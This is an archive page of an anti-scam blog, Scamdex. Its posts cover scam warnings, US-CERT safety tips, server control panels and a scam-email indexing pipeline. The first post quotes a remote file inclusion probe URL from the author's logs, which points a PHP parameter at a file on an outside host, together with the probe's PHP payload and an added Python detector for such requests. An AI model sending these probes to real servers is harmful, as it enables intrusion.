ScamBlog

Scamdex

Scamdex's Somewhat Cynical Take on Scams
Scamdex is a resource about scams, mainly internet-based. It contains a huge archive of carefully sifted email scams, categorized and analysed. The ScamBlog is commentary on the world of scams - scams which get bigger, cleverer and nastier day by day. These are our thoughts on stuff that makes us mad.

22 May '09

PHP Exploit URL foxes Apache

by @ 1:26 pm. Filed under Phishing, Uncategorized, Websites, humor, servers, spoof websites, tools

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one


Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away’ page :).

In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeeLCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’, on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?

Analyzing the URL gets me to this reduction of required parts:

* any .php file path
* any query string that contains an ‘http://’
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

Any URL with these parts will cause the same problem on an awful lot of famous-name servers, including mine: for example scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc. etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up:

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?
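One way to flag requests that match the four-part reduction above, run over access-log lines. This is an added example, not code from the original post: the log lines, the `example.invalid` host and all function names are constructed for illustration, and it detects the probe pattern only, without explaining the browser hang.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# "txt, gif, png" are the extensions the post lists; ".jpg" is an assumption.
DECOY_EXTENSIONS = (".txt", ".gif", ".png", ".jpg")
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
REQUEST_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in Apache combined-log style (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2009:13:20:01 +0000] "GET /a.php?b=http://c.gif? HTTP/1.1" 404 512',
    '192.0.2.11 - - [22/May/2009:13:20:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '192.0.2.12 - - [22/May/2009:13:21:40 +0000] '
    '"GET /errors.php?error=http%3A%2F%2Fexample.invalid%2Fid1.txt%3F HTTP/1.1" 404 512',
    '198.51.100.7 - - [22/May/2009:13:22:02 +0000] "GET /images/logo.gif HTTP/1.1" 200 900',
]


def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding (http%253A%252F...) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_indicators(request_target):
    """Return which traits of the post's reduction a request target shows.

    An empty list means no query parameter carries a remote URL.
    """
    parts = urlsplit(request_target)
    found = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(raw)  # parse_qsl already decoded one layer
        if not REMOTE_URL.match(value):
            continue
        found.append("remote-url-in-param:" + name)
        if value.endswith("?"):
            found.append("trailing-question-mark")
        if value.rstrip("?").lower().endswith(DECOY_EXTENSIONS):
            found.append("decoy-file-extension")
    if found and parts.path.lower().endswith(".php"):
        found.append("php-path")
    return found


def scan_log(lines):
    """Return (client_ip, request_target, indicators) for each suspicious line."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.match(line)
        if not match:
            continue
        indicators = rfi_indicators(match.group(2))
        if indicators:
            hits.append((match.group(1), match.group(2), indicators))
    return hits


if __name__ == "__main__":
    for ip, target, indicators in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(indicators))
```

In mod_rewrite the same test belongs in a `RewriteCond %{QUERY_STRING}` line, because a `RewriteRule` pattern is matched against the URL path only and never sees the query string. Legitimate parameters that carry URLs (redirect targets, for instance) will also match, so treat a hit as a triage signal and allowlist known parameters.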


25 Mar '09

Who or What is BobBear?

by @ 1:52 pm. Filed under Email Scams, Job Scams, Phishing, Websites, banking, money laundering, spoof websites

In my infrequent callouts to other websites that (like Scamdex) were created out of the blind fury experienced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has grown – lots of Government-funded sites have sprung up, large Internet organizations have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to buy Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo


Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!


18 Feb '09

Cyber Security Tip: Safeguarding Your Data

by @ 3:05 pm. Filed under Anti-Scam Protection, Email Scams, Scam Reports, Websites

Cyber Security Tip ST06-008: Safeguarding Your Data

When there are multiple people using your computer and/or you store sensitive personal and work-related data on your computer, it is especially important to take extra security precautions.

Why isn’t “more” better?

Maybe there is an extra software program included with a program you bought. Or perhaps you found a free download online. You may be tempted to install the programs just because you can, or because you think you might use them later. However, even if the source and the software are legitimate, there may be hidden risks. And if other people use your computer, there are additional risks.

These risks become especially important if you use your computer to manage your personal finances (banking, taxes, online bill payment, etc.), store sensitive personal data, or perform work-related activities away from the office. However, there are steps you can take to protect yourself.

How can you protect both your personal and work-related data?

1. Use and maintain anti-virus software and a firewall – Protect yourself against viruses and Trojan horses that may steal or modify the data on your own computer and leave you vulnerable by using anti-virus software and a firewall (see Understanding Anti-Virus Software and Understanding Firewalls for more information). Make sure to keep your virus definitions up to date.

2. Regularly scan your computer for spyware – Spyware or adware hidden in software programs may affect the performance of your computer and give attackers access to your data. Use a legitimate anti-spyware program to scan your computer and remove any of these files (see Recognizing and Avoiding Spyware for more information). Many anti-virus products have incorporated spyware detection.

3. Keep software up to date – Install software patches so that attackers cannot take advantage of known problems or vulnerabilities (see Understanding Patches for more information). Many operating systems offer automatic updates. If this option is available, you should turn it on.

4. Evaluate your software’s settings – The default settings of most software enable all available functionality. However, attackers may be able to take advantage of this functionality to access your computer. It is especially important to check the settings for software that connects to the internet (browsers, email clients, etc.). Apply the highest level of security available that still gives you the functionality you need.

5. Avoid unused software programs – Do not clutter your computer with unnecessary software programs. If you have programs on your computer that you do not use, consider uninstalling them. In addition to consuming system resources, these programs may contain vulnerabilities that, if not patched, may allow an attacker to access your computer.

6. Consider creating separate user accounts – If there are other people using your computer, you may be worried that someone else may accidentally access, modify, and/or delete your files. Most operating systems (including Windows XP and Vista, Mac OS X, and Linux) give you the option of creating a different user account for each user, and you can set the amount of access and privileges for each account. You may also choose to have separate accounts for your work and personal purposes. While this approach will not completely isolate each area, it does offer some additional protection. However, it will not protect your computer against vulnerabilities that give an attacker administrative privileges. Ideally, you will have separate computers for work and personal use; this will offer a different type of protection.

7. Establish guidelines for computer use – If there are multiple people using your computer, especially children, make sure they understand how to use the computer and internet safely. Setting boundaries and guidelines will help to protect your data (see Keeping Children Safe Online for more information).

8. Use passwords and encrypt sensitive files – Passwords and other security features add layers of protection if used appropriately (see Choosing and Protecting Passwords and Supplementing Passwords for more information). By encrypting files, you ensure that unauthorized people can’t view data even if they can physically access it. You may also want to consider options for full disk encryption, which prevents a thief from even starting your laptop without a passphrase. When you use encryption, it is important to remember your passwords and passphrases; if you forget or lose them, you may lose your data.

9. Follow corporate policies for handling and storing work-related information – If you use your computer for work-related purposes, make sure to follow any corporate policies for handling and storing the information. These policies were likely established to protect proprietary information and customer data, as well as to protect you and the company from liability. Even if it is not explicitly stated in your corporate policy, you should avoid allowing other people, including family members, to use a computer that contains corporate data.

10. Dispose of sensitive information properly – Simply deleting a file does not completely erase it. To ensure that an attacker cannot access these files, make sure that you adequately erase sensitive files (see Effectively Erasing Files for more information).

11. Follow good security habits – Review other security tips for ways to protect yourself and your data.
_________________________________________________________________
Author: Mindi McDowell. Produced 2006 by US-CERT, a government organization.
<http://www.us-cert.gov/cas/tips/ST06-008.html>


22 Dec '08

Free Email Services – they can be useful!

by @ 4:53 pm. Filed under Email Scams, Websites

Sooooo I went to the ZZN.com website, a free email service provider – it’s been around for years and does not seem to be going anywhere soon – and created a SCAMDEX.ZZN.COM email service – so you can go there and get a mystoopidname@scamdex.zzn.com email address to use and abuse as you wish.

Great if you want to contact someone but don’t want the relationship to continue…. not sure if you’re being scammed? create a new email address, give that out and if it all turns cruddy, just walk away. The accounts are removed after 30 days of no-use so you can forget all about it.

Beloved of scammers the world over (and especially popular in some of the more western parts of the African subcontinent), the free email address allows the freedom to communicate with no strings attached. It’s nice to be able to put it to a new use (kind of like a disposable razor).

Anyway, go ahead, get a new email address – don’t go sending any 5 megapixel photos there though, it’s only got 3MB quota!

One word of warning – ZZN are quite happy to pass on details to law enforcement officials so no scamming please!


8 Dec '08

… From CPanel to …. what??

by @ 2:26 pm. Filed under Scam Reports, Scamdex, Uncategorized, Websites, servers, spoof websites

I am an old Unix dude, I have installed more different versions of Unix than most people – everything from Sco Xenix/286 thru to Centos5.2 and I don’t usually have many problems – but as time wears on, my brainDisk is starting to squeal and it’s not as fast at random access as it used to be, so I was really happy when I rented a server with Cpanel/WHM installed on it.
For those who don’t know, Cpanel is the web-based interface to everything you will never learn on a Unix server – plus, the WHM super system allows you to carve off a chunk and sell it or give it away to your pals, reasonably confident that they won’t/can’t screw it up.
Add in virtual web/mail/log server management and lots of useful pre-installed tools and you have a system where you rarely have to get your hands dirty under the #hood.

Well, I love Cpanel now and I have grown to rely on it (curses!) so when it comes to creating my own server, so I can save money on a dedicated one, I find I need it to get things done (and my old stuff transferred).

The problem with CP is that it costs $$money. between $30 and $48/month. and. I. just. don’t. want. to. pay. that. any. more….. so….

Piracy is out – mainly because you need to register the license with CP and also because that’s bad!:’(

Perhaps I could install it, setup my system the way I want and then after a month or so, hand it back??

well, no apparently – most people (Including themselves) seem to be of the opinion that to uninstall CP, you should really re-install Linux…. kind of defeats my object here!

so…. alternatives, anyone?

There are a few – some other commercial (pay $$ for) such as DirectAdmin and some Public Domain ones (Web-CP, WebMin/VirtualMin). So I started evaluating these free Cpanel Alternatives ….

1. WebMin/VirtualMin

Looks like it will do the job – only one of the alts that I’ve heard of and actually used before. Installs easily enough and looks nice – has a fine range of functionality but what lets it down is its non-simplicity. Cpanel’s approach is to show you a bunch of things that you may want to do and ask sensible questions (with usually relevant tooltips close by) to help you accomplish your requirements. WebMin takes the ‘I’ll help you to write the configuration files correctly’ approach – you really have to know what you’re doing and in a lot of cases, the input fields are just blank with no clue as to what to put there.

WebMin Configuring Backup Example Screenshot


This probably highlights the major difference between CPanel/WHM and the rest of the Server Admin systems out there – CP/WHM does some pretty radical things to your server when you install it and this is why it’s so hard to uninstall. The other systems kind of leave things as they are and just act as configuration helpers. As an example, see the two screenshots of the ‘backup’ functions.

Cpanel Domain Owner Backup Page


2. Web-CP

Much, much, harder to install and harder to find the installation instructions too. but seems pretty good so far.

I had problems with the PHP startup scripts being written with DOS line endings which confused the life out of me for a while until I found it.  Still not able to start the system up but suspect it’s something to do with the line that reads:

$args = trim(next($HTTP_SERVER_VARS["argv"]));

(Shouldn’t that just be ARGV for shell scripts?)

… I’ll continue and let you know how I get on.


4 Dec '08

US-CERT Re-Issues Warning about Shopping Online

by @ 11:18 am. Filed under Anti-Scam Protection, Phishing, Websites, money laundering

This is a notice that you should send to your family and friends (especially the ‘silver surfers’), and maybe even stick on the fridge door and on the side of your monitor, just so you remember. Help make this a Scam-Free Christmas!

US-CERT Issues Warning about Cyber Shopping

Online shopping has become a popular way to purchase items without the hassles of traffic and crowds. However, the Internet has unique risks, so it is important to take steps to protect yourself when shopping online.

Why do online shoppers have to take special precautions?

The Internet offers a convenience that is not available from any other shopping outlet. From the comfort of your home, you can search for items from countless vendors, compare prices with a few simple mouse clicks, and make purchases without waiting in line. However, the Internet is also convenient for attackers, giving them multiple ways to access the personal and financial information of unsuspecting shoppers.  Attackers who are able to obtain this information may use it for their own financial gain, either by making purchases themselves or by selling the information to someone else.

How do attackers target online shoppers?

There are three common ways that attackers can take advantage of online shoppers:

How can you protect yourself?

This document can also be found on the US-CERT website.


16 Nov '08

Two REALLY good reasons to use FireFox as your web browser…

by @ 4:59 pm. Filed under Anti-Scam Protection, Websites, spoof websites

I know I keep banging on about this, but one of the easiest and cheapest ways to protect yourself from online scams and phishing is simple: Change your Web Browser!

Here are two really good reasons why you should use FireFox to surf the web instead of the ubiquitous Internet Explorer.

Firefox includes strict anti-phishing and anti-malware measures and it’s open source so it has thousands of security experts around the globe working around the clock to keep you (and your personal information) safe.

1. Anti-Malware

Firefox 3 protects you from viruses, worms, trojan horses and spyware. If you accidentally access an attack site, you’ll receive a full-sized browser message as a warning. A continuously updated list of attack-sites tells us when to stop you from browsing, so there’s nothing for you to update or maintain.

Anti Malware Warning in FireFox


2. Anti-Phishing

Shop and do business safely on the Internet. Firefox gets a fresh update of web forgery sites 48 times in a day, so if you try to visit a fraudulent site that’s pretending to be a site you trust (like your bank), a browser message—big as life—will stop you.


15 May '08

DNS (whassat?) it’s a great tool against Scammers!

by @ 2:54 pm. Filed under Anti-Scam Protection, Identity Theft, Phishing, Websites, spoof websites

The DNS Route to Scam Protection Online.

When you type in ‘www.scammingsite.com’ on your browser, a lookup is performed to translate the domain name into a unique address (IP Address) that all networked computers understand and which contains the path to the right server.

Your ISP will have given you two longish ‘numbers-separated-by-dots’ (eg. 207.44.123.28) to type in to your Network Settings. These are the Domain Name Servers (DNS) that your computer will use whenever you ask to go to a domain name.

Right? Well, never mind, just trust me on this one.

Wouldn’t it be great if, when you did the lookup/translate part, the result was filtered for Scams/Profanity/Pornography/Crime/Violence etc etc?

Well, by changing the DNS servers you use, you can have this great feature – for free, I may add – and you (and your children/employees) can surf a little easier. No software to download, no subscriptions, no spam – it couldn’t be easier. Free, simple to do, free, great protection… what more can I say, other than: if you don’t believe me, click this button to find out why you need to change your DNS servers NOW!

(or, you can just change your DNS servers to 208.67.222.222 and 208.67.220.220 and get on with your life)

BTW, the same people who run OpenDNS.com also run an Anti-Phishing site called, amusingly, PhishTank.


19 Mar '08

New Scam Email Indexing Method (again!)

by @ 3:37 pm. Filed under Email Scams, Scamdex, Websites

It’s my third iteration on the same basic principle: take a carefully filtered and enhanced archive of 150,000 email messages and then sort, categorize and analyze them, then put them in a defanged, indexable/searchable list format so that people can browse them.

The first was a program I wrote in Perl back in 2004; it was a POP sucker that connected to the mailbox, attempted to extract message parts and rewrite them as an HTML page. While successful, I was never happy at my efforts to disentangle nested messages and alternate body parts – this meant that a lot of emails showed up with lots of Base64 and other garbage. (eg. ScamDB_S_74.php)

The next try I had was to use a mail archive indexer program called ‘Hypermail‘. This was mostly successful at splitting messages into component parts but was still not quite flexible enough for my needs and the indexes were way too long. (eg. HYPMAIL/date.php)

So this spring, I am trying a whole new system that I rewrote in PHP, my code of choice for the decade. I am still mailbox based, mainly so that I can prune spam that has sneaked through my filters, but that may change soon.

This is how the Scamdex Engine works:

  1. Scam Emails arrive in the honeypot mailbox.
  2. Using Thunderbird with various Add-ons, I partially manually sort the scam emails into a holding mailstore and throw away the junk.
  3. A program runs nightly which:
    1. Analyses emails in the holding mailstore into one of 5 categories (419/AFF, Auctions, Jobs, Phishing, Lottery).
    2. Adds some extra Headers to the email.
    3. Moves it to the correct mailbox archive location.
    4. Runs MHonArc to create the indexed archive and html-ized emails.
    5. Post-processes the MHonArc-ized pages to add a PHP index include file, update the (MySQL) database and distribute the keywords and scoring to META and the nice little graph widget.
    6. Our illustrious Founder
    7. err… that’s it!

It’s not pretty or fast but it works, and I can understand it. It’s easy to fix and add to. It’s annoying having to run the process every night from scratch but until I work out how to use the MHonArc system to add/delete emails from the archive, it’s all I can do. Any suggestions about how I can do this better, let me hear them!

(send to scamblog(a)o7e.net)
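A sketch of steps 3.1 and 3.2 of the engine above, which also handles the nested messages and Base64 alternate body parts that tripped up the first Perl version. This is an added example, not the Scamdex code: the keyword lists, the `X-Scam-*` header names, the sample message and all function names are assumptions made for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# The five categories come from the post; the keyword lists are assumptions.
CATEGORIES = {
    "419/AFF": ("next of kin", "barrister", "transfer of funds"),
    "Auctions": ("escrow", "second chance offer", "winning bid"),
    "Jobs": ("work from home", "payment processing agent"),
    "Phishing": ("verify your account", "confirm your identity"),
    "Lottery": ("lottery", "claim your prize", "winning number"),
}
URL = re.compile(r"https?://[^\s<>\"]+")


def readable_text(msg):
    """Decode every text/* leaf, descending into multiparts and forwarded messages."""
    plain, html = [], []
    for part in msg.walk():
        if part.is_multipart() or part.get_content_maintype() != "text":
            continue
        try:
            body = part.get_content()  # undoes base64/quoted-printable and charset
        except (LookupError, UnicodeDecodeError):
            body = part.get_payload(decode=True).decode("latin-1")
        (plain if part.get_content_subtype() == "plain" else html).append(body)
    if plain:
        return "\n".join(plain)
    return re.sub(r"<[^>]+>", " ", "\n".join(html))  # crude tag strip as fallback


def defang(text):
    """Make links non-clickable before the message is published in the archive."""
    return URL.sub(
        lambda m: m.group(0).replace("http", "hxxp", 1).replace(".", "[.]"), text)


def classify(text):
    """Score each category by keyword hits; return (best category or None, scores)."""
    lowered = text.lower()
    scores = {cat: sum(lowered.count(k) for k in words)
              for cat, words in CATEGORIES.items()}
    best = max(scores, key=scores.get)
    return (best if scores[best] else None), scores


def process(raw):
    """Parse one raw email, tag it with extra headers, return (message, defanged text)."""
    msg = email.message_from_string(raw, policy=policy.default)
    text = readable_text(msg)
    category, scores = classify(text)
    msg["X-Scam-Category"] = category or "Unsorted"   # hypothetical header name
    msg["X-Scam-Score"] = str(scores.get(category, 0))  # hypothetical header name
    return msg, defang(text)


def build_sample():
    """Constructed sample: a forwarded scam whose text exists only in base64 parts."""
    inner = EmailMessage()
    inner["Subject"] = "CONGRATULATIONS"
    inner["From"] = "claims@example.invalid"
    inner.set_content("Your email won our lottery. To claim your prize visit "
                      "http://claims.example.invalid/form", cte="base64")
    inner.add_alternative("<p>Your email won our <b>lottery</b>.</p>",
                          subtype="html", cte="base64")
    outer = EmailMessage()
    outer["Subject"] = "Fwd: CONGRATULATIONS"
    outer.set_content("see attached")
    outer.add_attachment(inner)  # becomes a nested message/rfc822 part
    return outer.as_string()


if __name__ == "__main__":
    tagged, body = process(build_sample())
    print(tagged["X-Scam-Category"], tagged["X-Scam-Score"])
    print(body)
```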


6 Mar '08

Don’t try to scam Scamdex, Ok?

by @ 11:05 am. Filed under Dodgy Products, Websites, ebay, phone scams

I give my cellphone number out to very few people. Friends, relatives, Scamdex-related business and the occasional on-line order, if they insist. So when I get a call, it’s normally someone I know personally or business. So I was surprised to get a call from an outfit called ‘Auction Profits LLC’ (http://www.auctionprofitsllc.com), asking me if I want to make money with drop-shipping on eBay.

After listening to their inept spiel which seems to involve mentioning eBay and MONEY as often as possible, I asked them where they got my phone number and name. The claim was that I had placed an order with another company called ‘Online Supplier’ (http://www.onlinesupplier.com). They knew my name, address and phone number and indicated that they had additional credit card information as well.

When I persisted, I was zapped to the supervisor who blustered about how I must have bought something from them before and, anyway, how about making some money on eBay?

He completely missed the point that I made that I run a website devoted to exposing scams (such as his) and he dropped my call. I got a weird ‘private’ call a few minutes later (2 minutes of static followed by a ‘sorry wrong number’) which I strongly suspect was them.


